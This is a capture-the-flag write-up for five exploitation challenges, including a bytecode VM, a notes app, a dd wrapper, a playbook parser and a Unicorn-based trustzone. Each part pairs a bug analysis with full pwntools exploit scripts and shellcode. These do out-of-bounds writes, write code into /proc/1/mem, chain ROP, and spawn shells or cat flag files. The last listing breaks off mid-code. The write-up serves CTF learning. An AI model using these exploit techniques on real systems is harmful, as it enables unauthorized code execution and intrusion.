alt text

Write-ups for 5 challenges I solved.

All scripts and IDA databases are stored in the attachment file. I don’t describe how I reversed the challenge binaries; check the IDA databases if you want to see what I did to reverse them.

multiarch-2

Analyze

First, I analyzed two functions, mapSegment (0x1319) and panic (0x2A1E), to figure out the structure of the VM:

// One dynamically registered VM data region; entries are filled in by allocNewSegment.
struct __attribute__((packed)) BufIO
{
  char *data;   // host buffer backing the region (calloc'd, 0x200 bytes, in allocNewSegment)
  uint offset;  // VM offset assigned to the start of the region
};


// Recovered layout of the interpreter state that mapSegment allocates with calloc(1, 0x88).
struct __attribute__((packed)) __attribute__((aligned(1))) VM
{
  void *page1;          // 0x1000-byte mmap page (prot 7); mapSegment copies chunk1 into it
  void *page2;          // 0x1000-byte mmap page (prot 7); mapSegment copies chunk2 into it
  void *pagedummy;      // third 0x1000-byte mmap page; mapSegment copies nothing into it
  char *page3;          // calloc'd copy of chunk3
  size_t size3;         // size in bytes of chunk3 / page3
  char *(*func)(void);  // initialised to getFlag by mapSegment
  char check[3];        // check[0] is set to 1 when a syscall handler reports failure
  int rip;              // program counter, starts at 4096 (0x1000)
  int stack;            // stack pointer, starts at 0x8F00
  uint regs[4];         // general-purpose registers, printed as A, B, C, D by panic
  BufIO bufs[5];        // regions registered by allocNewSegment (at most 5)
  // NOTE(review): allocNewSegment only reads and writes the low byte of bufcount, and a
  // 1-byte counter would make this packed struct exactly 0x88 bytes (the calloc size in
  // mapSegment), so this field is probably a uint8 -- confirm in the IDA database.
  uint bufcount;        // number of bufs entries in use
};


// Builds the interpreter state from the three chunks described by SegmentList.
// Allocates the VM, three anonymous 0x1000-byte pages and a heap copy of chunk3,
// copies chunk1/chunk2/chunk3 into page1/page2/page3 and sets the initial PC and SP.
// Returns the new VM. None of the calloc/mmap results are checked here.
VM *__fastcall mapSegment(SegmentList *SegmentList)
{
  VM *vm; // rbx
  void *page1_; // r14
  void *page2_; // r13
  void *page3_; // r12
  size_t size; // r13

  vm = (VM *)calloc(1uLL, 0x88uLL);
  // prot 7 = PROT_READ|PROT_WRITE|PROT_EXEC, flags 33 = MAP_SHARED|MAP_ANONYMOUS (Linux values)
  page1_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  vm->page1 = page1_;
  page2_ = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  vm->page2 = page2_;
  vm->pagedummy = mmap(0LL, 0x1000uLL, 7, 33, 0, 0LL);
  page3_ = calloc(1uLL, SegmentList->chunk3.size);
  vm->page3 = page3_;
  vm->func = getFlag;
  // NOTE(review): the copy lengths come straight from SegmentList; no bound against the
  // 0x1000-byte pages is visible in this function -- presumably validated by the loader.
  memcpy(page1_, SegmentList->chunk1.data, SegmentList->chunk1.size);
  memcpy(page2_, SegmentList->chunk2.data, SegmentList->chunk2.size);
  size = SegmentList->chunk3.size;
  memcpy(page3_, SegmentList->chunk3.data, SegmentList->chunk3.size);
  vm->size3 = size;
  vm->rip = 4096;       // 0x1000
  vm->stack = 0x8F00;
  return vm;
}

void __fastcall __noreturn panic(VM *vm, char a2)
{
  int i; // ebp
  unsigned int current_stack; // r12d
  const char *__; // rsi
  int dest; // [rsp+Ch] [rbp-44h] BYREF
  unsigned __int64 v6; // [rsp+10h] [rbp-40h]

  v6 = __readfsqword(0x28u);
  printf(
    "  ---[ PC=0x%08x SP=0x%08x | A=0x%08x B=0x%08x C=0x%08x D=0x%08x\n",
    vm->rip,
    vm->stack,
    vm->regs[0],
    vm->regs[1],
    vm->regs[2],
    vm->regs[3]);
  if ( a2 )
  {
    puts("  ---[ STACK CONTENTS");
    for ( i = -8; i != 20; i += 4 )
    {
      current_stack = vm->stack + i;
      if ( !read_4(vm, current_stack, &dest) )
        break;
      __ = "  ";
      if ( vm->stack == current_stack )
        __ = "* ";
      printf("\t%s0x%08x  0x%08x\n", __, current_stack, dest);
    }
  }
}

Basically, the VM struct has one PC register, one stack register and 4 general-purpose registers.
It has three pages (page1, page2 and pagedummy) which are used to store the bytecode; page3 is used to store the data.

func is a function pointer that mapSegment initializes to getFlag:

// Returns the value of the FLAG environment variable.
// When FLAG is not set, writes an error message to stderr and returns NULL.
char *getFlag()
{
  char *v0; // rbx

  v0 = getenv("FLAG");
  if ( !v0 )
    fwrite("[E] no $FLAG set! do you need to hack harder?\n", 1uLL, 0x2EuLL, stderr);
  return v0;
}

When I saw this function, I knew my job was to overwrite this function pointer.

For more details on how these 4 pages work, let’s review getDest and allocNewSegment.
Given an offset, the getDest function returns:

page1 + offset - 0x1000 if the offset is in range [0x1000, 0x2000) (this is why the initial value of pc is 0x1000)
page2 + offset - 0x2000 if the offset is in range [0x2000, 0x3000)
pagedummy + offset - 0x8000 if the offset is in range [0x8000, 0x9000)
Otherwise, it returns bufs[i].data[offset - bufs[i].offset] for the BufIO object that contains the offset

To figure out where these bufs objects come from, check allocNewSegment:

// Registers a new 0x200-byte data region in the VM and reports the base offset it got.
//   vm     - interpreter state; one bufs[] slot and bufcount are updated
//   offset - requested VM offset; only its page-aligned part (offset & 0xFFFFF000) is used
//   ret    - receives the base offset that was actually assigned
// Returns 1 on success, 0 (without touching *ret) when all 5 BufIO slots are in use.
bool __fastcall allocNewSegment(VM *vm, int offset, unsigned int *ret)
{
  unsigned __int8 n5; // r12
  bool result; // al
  unsigned int final_offset; // ebx
  char *data; // rax
  __int64 n5_1; // rdx

  n5 = vm->bufcount;
  result = 0;
  if ( n5 != 5 )
  {
    final_offset = offset & 0xFFFFF000;
    // requests whose page-aligned part is 0 (offset < 0x1000) default to 0xA000
    if ( (offset & 0xFFFFF000) == 0 )
      final_offset = 40960;
    // move up in 0x1000 steps for as long as getDest resolves the candidate base,
    // presumably meaning that base is already mapped
    while ( getDest(vm, final_offset, 1LL) )
      final_offset += 0x1000;
    // only the low byte of bufcount is written
    LOBYTE(vm->bufcount) = n5 + 1;
    // the calloc result is stored without a NULL check
    data = (char *)calloc(0x200uLL, 1uLL);
    n5_1 = n5;
    vm->bufs[n5_1].data = data;
    vm->bufs[n5_1].offset = final_offset;
    *ret = final_offset;
    return 1;
  }
  return result;
}

For the first time it is called:

if offset < 0x1000, it allocates a BufIO object which represents the VM’s data at offset [0xa000, 0xa000+0x200); on later calls the base is moved up in 0x1000 steps past every base that getDest already resolves, i.e. [0xa000+0x1000*n, 0xa000+0x1000*n+0x200).
if offset >= 0x1000, the base is offset & 0xFFFFF000 instead (for example, offset 0x3000 gives [0x3000, 0x3000+0x200)), moved up in 0x1000 steps in the same way when that base is already taken.

That is why getDest would return bufs.data[offset - bufs.offset] if the offset >= 0x3000.

Check some “interesting” syscall and find the bug

In exec_regVM function, there are two syscalls used for read/write buffer which should be useful for the future exploitation.

{
  switch ( op )
  {
    case 0u:
      return 0;
    case 1u:
      LOBYTE(Int_1) = check_sys_num(vm);
      Int = Int_1;
      if ( (_BYTE)Int_1 )
      {
        switch ( vm->regs[0] )
        {
          case 0u:
            Int = getInt(vm, &y);
            if ( (_BYTE)Int )
              vm->regs[0] = y;
            else
              vm->check[0] = 1;
            break;
          case 1u:
            Int = readBuf(vm, vm->regs[1], vm->regs[2]);
            if ( !(_BYTE)Int )
              vm->check[0] = 1;
            break;
          case 2u:
            Int = printBuf(vm, vm->regs[1], vm->regs[2]);
            if ( !(_BYTE)Int )
              vm->check[0] = 1;
            break

I could call syscall 0 to change regs[0] and then call any syscall I want, but I had to find a way to control regs[1] and regs[2].

This thought led me to check opcode 0x21 of regVM. In this case, I could add any value to one of the registers:

case 0x21u:
  v16 = vm->rip;
  vm->rip = v16 + 1;
  if ( (unsigned __int8)read_1(vm, v16, &n)
    && (LOBYTE(Int_3) = read_4(vm, (unsigned int)vm->rip, &y), Int = Int_3, (_BYTE)Int_3) )
  {
    vm->rip += 4;
    vm->regs[(n >> 4) - 1] += y;
  }

And … so I found something interesting. I control the value of n, and there is no check that the index (n >> 4) - 1 is within the bounds of regs, which means I could also change the value of bufs!

Up to now, everything was clear. I just need to call allocNewSegment to allocate a BufIO object and change its data to an address that is useful to leak memory.

Xrefs the allocNewSegment, I could use syscall 6 of stackVM to call the function with any arguments I want:

if ( op.op == (char)0xA0 )
{
  if ( check_sys_num(vm) )
  {
    if ( (unsigned __int8)read_1_stack(vm, &dest) )
    {
      switch ( dest )
      {
        ...
        case 6:
          if ( (unsigned __int8)read_4_stack(vm, &inp)
            && allocNewSegment(vm, inp, &ret)
            && (unsigned __int8)pushInt(vm, ret) )
          {
            goto LABEL_22;
          }
        ...
      }
    }
  }
}
...

By calculating the offset between the vm object and the first BufIO::data, we can change data to point at vm->page2 and leak page2’s address.

After that, just change data to point at vm->func and make func point to page2 (where we can set up our shellcode).

alt text

Since the program uses a bit test to determine whether it should use regVM or stackVM, I asked ChatGPT for help crafting the right payload :).

Final script

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("debug")
libc = e.libc
gs = """
ida_connect
"""


def start():
    if args.LOCAL:
        p = e.process(["inp.masm"])
    elif args.GDB:
        p = gdb.debug([e.path, "inp.masm"], gdbscript=gs)
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
        data = open("inp.masm", "rb").read()
        p.sendlineafter(b"How big is your program? ", str(len(data)).encode())
        p.send(
            data
        )
    return p


rip = 4096


def set_page3_bit(page3, rip, should_be_set):
    """Set or clear the bit that corresponds to VM address ``rip`` in ``page3``.

    ``page3`` is a mutable byte buffer (e.g. ``bytearray``) that is modified
    in place. The byte index is derived from ``rip`` relative to 4096 and the
    bit position is ``rip & 7``. When the byte index falls outside ``page3`` a
    warning is printed and the buffer is left untouched.
    """
    # Same arithmetic as the C code this mirrors: below 4096 the delta is
    # biased by +7 before the shift (rip - 4096 + 7 == rip - 4089).
    delta = rip - 4096 if rip >= 4096 else rip - 4089
    byte_idx = delta >> 3
    mask = 1 << (rip & 7)

    if byte_idx < 0 or byte_idx >= len(page3):
        print(f"Warning: v2 >> 3 = {byte_idx} out of bounds")
        return

    if not should_be_set:
        page3[byte_idx] &= ~mask
        return
    page3[byte_idx] |= mask


f = open("inp.masm", "wb")
f.write(b"MASM")


instructions = [
    [0, p8(0x10)+p32(6)],  # push 6
    [0, p8(0xa0)+p32(0)],  # call allocNewSegment(0)
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffef88)], # Change data -> page2
    [1, p8(0x21)+p8(1 << 4)+p32(2)], # syscall 2
    [1, p8(0x21)+p8(2 << 4)+p32(0xa000)],
    [1, p8(0x21)+p8(3 << 4)+p32(0x8)],
    [1, p8(1)], # print
    [1, p8(0x21)+p8(5 << 4)+p32(0xffffffd8)],
    [1, p8(1)],
    [1, p8(0x21)+p8(5 << 4)+p32(0x28)],
    [1, p8(0x21)+p8(1 << 4)+p32(0xffffffff)], # syscall 1
    [1, p8(1)], # write
    [0, p8(0x10)+p32(5)], # call getFlag
    [0, p8(0xa0)+p32(0)],
]

segAdata = b''
segBdata = asm(shellcraft.cat("/flag"))
segCdata = bytearray(0x1000)

for ins in instructions:
    segAdata += ins[1]


for expected, instr in instructions:
    set_page3_bit(segCdata, rip, expected)
    rip += len(instr)


segA = p8(1)+p16(19)+p16(len(segAdata))
segB = p8(2)+p16(19+len(segAdata))+p16(len(segBdata))
segC = p8(3)+p16(19+len(segAdata)+len(segBdata))+p16(len(segCdata))

f.write(segA+segB+segC+segAdata+segBdata+segCdata)

f.close()

p = start()

p.recvuntil(b'[I] executing program\n')
e.address = u64(p.recv(8)) - e.sym.getFlag
log.success(hex(e.address))

# p.sendline(p64(e.plt.puts))
segA_addr = u64(p.recv(8))

p.sendline(p64(segA_addr-0x1000))


p.interactive()

the-classic-notes-app

Bug

write_note doesn’t check whether offset is larger than the note’s size:

// Copies size bytes from buffer into notes[index], starting at byte offset.
// Rejects (with a message) an index outside [0, note_size), a note that has not
// been created yet, and a negative offset. No other validation is performed.
void write_note(int index, int offset, const char *buffer, int size)
{
    if (index < 0 || index >= note_size)
    {
        printf("Index out of range\n");
        return;
    }
    if (notes[index] == NULL)
    {
        printf("Create note first\n");
        return;
    }
    if (offset < 0)
    {
        printf("Offset cannot be less than 0\n");
        return;
    }
    // Neither offset nor offset + size is compared against the size of the note's
    // allocation (and size itself is not range-checked), so this copy can write
    // past the end of notes[index].
    memcpy(notes[index] + offset, buffer, size); // bug
}

Exploit

To make it easy to debug, I do not set GLIBC_TUNABLES='glibc.mem.tagging=1'.

alt text

Just write to notes[0] at offset 0x60; this actually changes the value of notes[0] itself.
Write \xb8\x02 to make notes[0] point to the flag function pointer.
After that, read notes[0] to leak the flag function address.
Write to notes[0] at offset 0x18 to change the exit function pointer; we want it to become flag.
Try to change notes[0] to an invalid address -> read note -> segfault -> call flag

This seems quite easy, but what if GLIBC_TUNABLES='glibc.mem.tagging=1' is set:
alt text

The offset is random now, but only in the highest byte.

So I just need to brute-force the offset, P=1/256:

#!/usr/bin/env python
from pwn import *
from time import sleep

context.binary = e = ELF("ctf")

gs = """
target remote:1234
"""


def start():
    argvs = ["./qemu-aarch64", "-L", "./aarch64-linux-gnu/"]
    if args.LOCAL:
        argvs.append(e.path)
        p = process(argvs)
    elif args.GDB:
        argvs.append("-g")
        argvs.append("1234")
        argvs.append(e.path)
        p = process(argvs)
        # gdb.attach(None, gdbscript=gs)
        # pause()
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
    return p


def create_note(size: int):
    p.sendlineafter(b'Give me your command:\n', b"C"+str(size).encode())


def read_note(idx: int):
    p.sendlineafter(b'Give me your command:\n',
                    b'R'+str(idx).encode())


def write_note(idx: int, offset: int, size: int, data: bytes):
    p.sendlineafter(b'Give me your command:\n',
                    b'W' + f"{idx} {offset} {size}".encode()+data)


for i in range(256+10):
    try:
        p = start()
        # create_note(0x30)
        in0 = p16(0x2a8)
        write_note(0, 0x000000000000060, len(in0), in0)
        read_note(0)
        p.recvuntil(b'Note at 0: ')
        in1 = p.recv(6)

    except EOFError:
        p.close()
        continue
    else:
        log.info(hex(u64(in1+b'\0'*2)))
        write_note(0, 0x10, len(in1), in1)
        write_note(0, 0xf0-8, 8, b'A'*8)
        read_note(0)
        break

p.interactive()

pwn-datadefinition

Analyze

import subprocess
import sys


def main():
    """Prompt for dd arguments and stdin data, run dd, and print its output.

    The first input line is split on whitespace and passed to ``dd`` as
    separate arguments (no shell is involved); the second input line is fed
    to ``dd`` on its standard input.
    """
    print('Do you like dd? It is my favorite old-style tool :D\n')
    # str.encode() with no argument uses UTF-8
    line = input('  > What is your favorite dd line?: ').encode()
    user_input = input('  > Any input to go with it?: ').encode()
    print('I like it! Let\'s give it a go!')
    res = subprocess.run(['dd'] + line.split(), input=user_input,
                         capture_output=True)
    print(res.stdout.decode('utf-8'))
    print(res.stderr.decode('utf-8'))
    print('It was fun, bye!')


if __name__ == '__main__':
    main()

With dd, we can read/write any files, any where we want.
But the flag file has a random name.

alt text

Somehow, the python file on the container is a static binary.

The author did not mention this in the challenge’s description. From here on, I would call it a guessy challenge.

Since the addresses do not change, we can use the /proc/.../mem trick.

From the config files, I could guess that the pid of the python process should be 1:

mode: ONCE
uidmap {inside_id: "0"}
gidmap {inside_id: "0"}
keep_caps: true
...

cwd: "/home/user"

mount: [
 ....
  {
    dst: "/proc"
    fstype: "proc"
    rw: true
  }
  ...
]

CMD kctf_setup && \
    kctf_drop_privs \
    socat \
      TCP-LISTEN:1337,reuseaddr,fork \
      EXEC:"kctf_pow nsjail --config /home/user/nsjail.cfg -- /usr/bin/python3 -u /home/user/chall.py"

Since keep_caps is true, we should be able to write on /proc/1/mem.

alt text

Now, what do I have to write, and where?

Since line and user_input use Python’s default encoding, which is utf-8, I could not write arbitrary bytes; each byte must not be greater than 0x7f.

I found that when pymain_main is going to return, rdi=0, rsi=rsp-0x208, and rdx is big enough. So I just wrote syscall ; ret at the end of the function.
alt text

I would say that I was lucky to spot this way of dealing with this guessy challenge.

Final script

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.arch = 'amd64'
shellcode = asm("""
syscall
ret
""")
escaped = ''.join(f'\\x{b:02x}' for b in shellcode)

host_port = sys.argv[1:]
p = remote(host_port[0], int(host_port[1]))

if host_port[0] != "localhost":
    p.recvuntil(b'You can run the solver with:\n')
    cmd = p.recvline().decode()
    log.info(cmd)
    ans = popen(f"bash -c '{cmd}'").read()
    p.sendlineafter(b'Solution? ', ans.encode())

pause()

p.sendlineafter(b'  > What is your favorite dd line?: ',
                b'if=/proc/self/fd/0 of=/proc/1/mem bs=1 seek='+str(0x6BC71E).encode())
p.sendlineafter(b'Any input to go with it?:',
                shellcode.decode('latin-1').encode())

pause()

p.send(
    b'\0'*0x208 +
    p64(0x00000000004f8dbd) + p64(0x75e1c1) + p64(0x00000000004f8dbd+1) +
    p64(0x4206c0)
)

p.interactive()

pwn-playbook

Bug

There is only one bug and it is in new_playbook function:

Since nesting_depth is a global variable, there is always a chance that p_idx can be decreased even while it is still pointing to idx[0]:

int idx[11]; // [rsp+1004h] [rbp-4Ch] BYREF
  int *p_idx; // [rsp+1030h] [rbp-20h] MAPDST
  int nest; // [rsp+1038h] [rbp-18h]

  p_idx = idx;
  nest = 1;
  len = 251;
  puts("Enter new playbook in the SOPS language. Empty line finishes the entry.");
  idx[0] = allocate_playbook();
  while ( fgets(inpbuf, len, stdin) && inpbuf[0] != 10 )
  {
    memset(buf, 0, sizeof(buf));
    _isoc99_sscanf(inpbuf, "%s", buf);
    ...
    {
      if ( !strcmp(buf, "ENDSTEP") )
      {
        --p_idx;
        if ( --nesting_depth < 0 )
        {
          puts("Mismatched STEP and ENDSTEP.");
          exit(1);
        }
      }

We can decrease p_idx twice before running STEP; when p_idx is increased again, it points to len, which means len becomes equal to the return value of allocate_playbook:

if ( !strcmp(buf, "STEP") )
    {
      ++p_idx;
      if ( ++nesting_depth > 9 )
      {
        puts("Max nesting depth reached.");
        exit(1);
      }
      *p_idx = allocate_playbook();
      add_child(*(p_idx - 1), *p_idx);
      nest = 1;
    }

I need len to be greater than 512 so that I can overwrite the next playbook via strcpy:

strcpy_ifunc(steps[*p_idx].data, buf);

This can be achieved by creating more than 512 playbooks beforehand.

Exploit

I just need to change the type of the next playbook to CMD; it will then run any command stored in the note’s data.

#!/usr/bin/env python
from pwn import *
from os import popen
from time import sleep

context.binary = e = ELF("chal")

gs = """
set follow-fork-mode parent
# b *0x4021C5
# b *0x402605
# b new_playbook
# b *0x401E69
b *0x4025B7
"""


def start():
    if args.LOCAL:
        p = e.process()

    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    return p


def add(list_data: list[bytes]):
    p.sendline(b"2")
    p.recvuntil(
        b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
    for data in list_data:
        # if len(data) == 251 or b'\n' in data:
        #     p.send(data)
        # else:
        p.sendline(data)


def remove(idx):
    p.sendlineafter(b"5. Quit\n", b"3")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


def execute(idx):
    p.sendlineafter(b"5. Quit\n", b"4")
    p.sendlineafter(b"Enter playbook id:\n", str(idx).encode())


p = start()

# for i in range(1, 0x50):
#     add([b"note: " + b'A' * 0x30, b'STEP',
#          b"note: " + b'B' * 0x30, b'ENDSTEP', b'\n'])
#     remove(i + 1)

# add([b"note: " + b'A' * 0x30, b'\n'])
# execute(1)
# for i in range(0x4f):
#     p.recvuntil(b'Note: ')
#     if i == 0xa:
#         p.sendline(p8(i))
#     else:
#         p.send(p8(i)*251)

# sleep(1)

for i in range(1, 512+30):
    if i < 3:
        add([b"note: " + b'A' * 0x30, b'STEP', b'\n'])
    else:
        add([b"note: " + b'sh', b'\n'])
    log.info(str(i))


if args.GDB:
    gdb.attach(p, gdbscript=gs)
    pause()

# p.sendline(b'#'*249)
# p.sendline(b"2")
# p.recvuntil(
#     b'Enter new playbook in the SOPS language. Empty line finishes the entry.\n')
# p.send(b'note: ')
# for i in range(250-7):
#     p.send(b' ')

# pause()

# p.proc.stdin.close()
remove(512+20)
remove(512+21)

add([b'ENDSTEP', b'ENDSTEP', b'STEP', b'note: '+b'1'*(512)+p8(1 | 2), b'\n'])

execute(512+22)

p.sendline(b'\ncat /flag ; cat /flag.txt ; cat flag.txt ; cat flag')

p.interactive()

pwn-unicornel-trustzone

Analyze

The document only describes how the three trustzones work, not their source code:

There are currently three example trustzones you can load:

  Name: create_map_shared_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length
  Return Value: rbx = shared memory handle, or error code from create_shared if a buffer could not be created
  Description: This trustzone will create and map a shared memory buffer of the desired length into the current 
  process at the specified address.

  Name: map_shared_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = shared memory handle, rcx = addr, rdx = length
  Return Value: rbx = 0xffff on validate_handle failure, or the return value from the map_address syscall
  Description: This trustzone maps a shared memory buffer specified by the handle into the current process at 
  the specified address.

  Name: memprot_x86_64
  Calling Convention: rax = trustzone_invoke syscall #, rbx = addr, rcx = length, rdx = prot, rdi = password
  Return Value: rbx = 0xffff on password authentication failure, or the return value from the memprot syscall
  Description: This trustzone sets the memory protection on a range of memory. Please note that rdi must be a 
  pointer to a string containing the password.

So I created map_shared_x86_64 and memprot_x86_64 based on what the document says (I didn’t need create_map_shared_x86_64 since create_shared is not a trusted syscall):

from pwn import *

context.arch = 'amd64'

open("map_shared_x86_64", "wb").write(asm("""
mov r10, rcx
mov rcx, rdx
mov rax, 4
int 3
//validate_handle rax = address
mov rbx, rax
mov rcx, r10                                          
xchg rcx, rdx
xchg rdx, rbx
mov rax, 5                        
int 3
// map_address
mov rbx,rax                                                                                    
"""))
open("memprot_x86_64", "wb").write(asm("""
  mov rax, 11                                       
  mov r10, rbx
  mov r11, rdx                                       
  mov rbx, rdi
  //confirm password
  int3
  cmp eax,0
  je continue
  mov ebx, 0xffff
  jmp done                                                                              
continue:
  mov rbx, r10
  mov rdx, r11                                       
  mov rax, 12
  int3                                        
done:
  nop
"""))

As the document says, password authentication must succeed before we can use memprot_x86_64.

Why did I need memprot_x86_64? Because it can change the permissions of any address, including the trustzone:

long memprot(struct process* current) {
    TRUSTED_SYSCALL;
    unsigned long addr = ARG_REGR(current,1);
    unsigned long length = ARG_REGR(current,2);
    unsigned long prot = ARG_REGR(current,3);
    return uc_mem_protect(current->uc,addr,length,prot);
}

Since only the trustzone’s bytecode can call trusted syscalls, being able to write that bytecode is promising for further exploitation.

Leak password

Reading the source code of confirm_password, I could be sure that the password file is in the same directory as the chal file:

int password_fd = open("password",O_RDONLY);

I could take advantage of create_trustzone to read the password and map it at any address, since the function can open any file in the same directory:

for(unsigned i = 0; i < sizeof(filename); i++) {
        if(filename[i] == '.' || filename[i] == '/') {
            filename[i] = '_';
        }
    }
int fd = open(filename,O_RDONLY);

But safe_read checks whether the address overlaps the trustzone, so it was not easy to read the password:

// Returns true when a trustzone hook is installed and the range [src, src + n)
// intersects [trustzone, trustzone + PAGE_ALIGN(tz_size)).
// NOTE(review): src + n and trustzone + PAGE_ALIGN(tz_size) are computed without any
// overflow check, so values near the top of the address space make the sums wrap --
// confirm the field types in struct process.
bool overlaps_tz(struct process* current,long src, unsigned n) {
    return current->trusted_zone_hook && !(src + n <= current->trustzone || current->trustzone + PAGE_ALIGN(current->tz_size) <= src);
}

uc_err safe_read(struct process* current, char* dst, long src, size_t n) {
    if(overlaps_tz(current,src,n)) TRUSTED_SYSCALL;
    return uc_mem_read(current->uc,src,dst,n);
}

At first, I thought of making the size so big that src + n would cause an integer overflow (which means src + n < src).

This is ridiculous because no process can handle a size that big.

But then I thought again: what if the address itself were that big?

alt text

It turned out that unicorn doesn’t care whether the address is in user space or kernel space. After all, it is just an emulator.

With src = trustzone = 0xfffffffffffff000 and size = 0x1000, src + n wraps around to 0, so I could bypass overlaps_tz now.

alt text

Shellcode:

mov rax, 8
mov rbx, 0xfffffffffffff000
lea rcx, [rip+password]
int3
       
mov rax,1
mov rbx, 0xfffffffffffff000
mov rcx, 0x1000
int3     

password:
    .asciz "password"

Leak emulator address

With the leaked password, I could use memprot_x86_64 to enable write perm to trustzone.

The validate_handle function returns shared_buffers’s address:

long validate_handle(struct process* current) {
    TRUSTED_SYSCALL;
  ...
    return (long) shared_buffers[handle].buffer;
}

so I could write shellcode that calls this function and prints the return value to leak the address:

mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

I chose to allocate a buffer with a size of 0xf000. I expected this buffer to be at a fixed offset from the TLS address, which I could take advantage of to leak other segments’ addresses:

mov rsp, 0x13380800
                
mov rax, 3
mov rbx, 0xf000 
int3
// calloc 0xf000

mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $
map_shared_x86_64:
    .asciz "map_shared_x86_64"
memprot_x86_64:
    .asciz "memprot_x86_64"
password_buffer:
    .asciz "sup3r_s3cure_sj\0"
password:
    .asciz "password"
newline:
    .asciz "\n"
nop

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
    inc     rdi
    dec     rdx 
    jnz     memcpy_loop
memcpy_done:
    ret

evil:
mov eax, 4
xor ebx, ebx
mov ecx, 0x1000
int3
mov rbx, rax
mov eax,2
int3

Although it was not at a fixed offset from the TLS as I expected, I could leak the heap’s address and a JIT (RWX) address:
alt text

After having the leaked addresses, I created a new process which overwrote its trustzone with:

mov eax, 5
int3

This shellcode lets me call map_address directly, to read/write any host address I want.

Where to write the shellcode?

Up to this point, I leaked heap address, a RWX address.

At first, I tried to overwrite the code of thread 2 with shellcode that spawns a shell:
alt text

But the leaked RWX address is not at a fixed offset from the RIP of the second thread on the remote.

So I tried to leak the stack address of the second thread.

Because of the same shellcode and the same execution, I think the call stack of the remote process and the local one should be the same. Overwriting the second thread’s return address might be a good way.

I found that the second thread’s stack address could be leaked via a pointer at heap+0x5b00.

alt text

After overwriting its return address, the final step is to make it return.

alt text

I saw that it checks whether a local variable ($rbp-0x10) is negative.

Up to this point, the variable is always equal to 0, so the thread would never leave the loop (I think because my first shellcode ends with jmp $).

So I changed the variable to -1 (as you can see, it lives in the heap segment, whose address I had already leaked).

The second thread then returns and executes our shellcode.

alt text

Final script

This is so f*cking long. I suggest you should debug yourself first.

#!/usr/bin/env python
from pwn import *
from time import sleep
from os import popen

context.binary = e = ELF("chal")

gs = """
"""
def start():
    if args.LOCAL:
        p = e.process(stderr=open("/dev/null", "w"))
        
    elif args.REMOTE:  # python x.py REMOTE <host> <port>
        host_port = sys.argv[1:]
        p = remote(host_port[0], int(host_port[1]))
        p.recvuntil(b'You can run the solver with:\n')
        cmd = p.recvline().decode()
        log.info(cmd)
        ans = popen(f"bash -c '{cmd}'").read()
        p.sendlineafter(b'Solution? ', ans.encode())
    return p

code1 = asm(open("shellcode1.asm", "r").read())+b'\x90'*0x40
data1 = p32(4)  # UC_ARCH_X86
data1 += p32(1 << 3)  # UC_MODE_64
data1 += (
    p64(0x13370000) + p64(0x1000) +
    p64(0x13380000) + p64(0x1000) +
    p64(0x13390000) + p64(0x1000) +
    p64(0x133a0000) + p64(0x2000)
)
data1 += p16(len(code1))
data1 += p8(3)
data1 = data1.ljust(0x50, b'\0')

p = start()

p.send(data1)
p.sendafter(b"CODE_START\n", code1)
p.recvuntil(b'new process created with pid 0\n')
p.recvuntil(b'0\n')
buf0 = int(p.recvline().decode())
log.info(hex(buf0))

code2 = asm(open("shellcode2.asm", "r").read().replace("leaked_address", str(buf0+0xf000))) + b'\x90'*0x20 + asm(shellcraft.sh())

data2 = p32(4)  # UC_ARCH_X86
data2 += p32(1 << 3)  # UC_MODE_64
data2 += (
    p64(0x13470000) + p64(0x1000) +
    p64(0x13380000) + p64(0x1000) +
    p64(0x13390000) + p64(0x1000) +
    p64(0x133a0000) + p64(0x2000)
)
data2 += p16(len(code2))
data2 += p8(3)
data2 = data2.ljust(0x50, b'\0')

if args.GDB:
    gdb.attach(p, gdbscript=gs)
    pause()

p.send(data2)
p.sendafter(b"CODE_START\n", code2)
p.interactive()

shellcode1:

mov rsp, 0x13380800
mov r10, 0x13390000
                
mov rax, 3
mov rbx, 0xf000 
int3
// calloc 0xf000


mov rax, 8
mov rbx, 0x42420000
lea rcx, [rip+memprot_x86_64]
int3

mov rax, 10
mov rbx, 0x42420000
mov rcx, 0x1000
mov rdx, 7
lea rdi, [rip+password_buffer] 
int3

mov rbx, rax     
mov rax, 2
int3

mov rdi, 0x42420000
lea rsi, [rip+evil]
mov edx, 0x20
call memcpy

mov eax,10
int3

jmp $

map_shared_x86_64:
    .asciz "map_shared_x86_64"
memprot_x86_64:
    .asciz "memprot_x86_64"

password_buffer:
    .asciz "sup3r_s3cure_sj\0"
password:
    .asciz "password"
newline:
    .asciz "\n"
nop

memcpy:
    test    rdx, rdx         
    jz      memcpy_done
memcpy_loop:
    mov     al, [rsi]  
    mov     [rdi], al
    inc     rsi
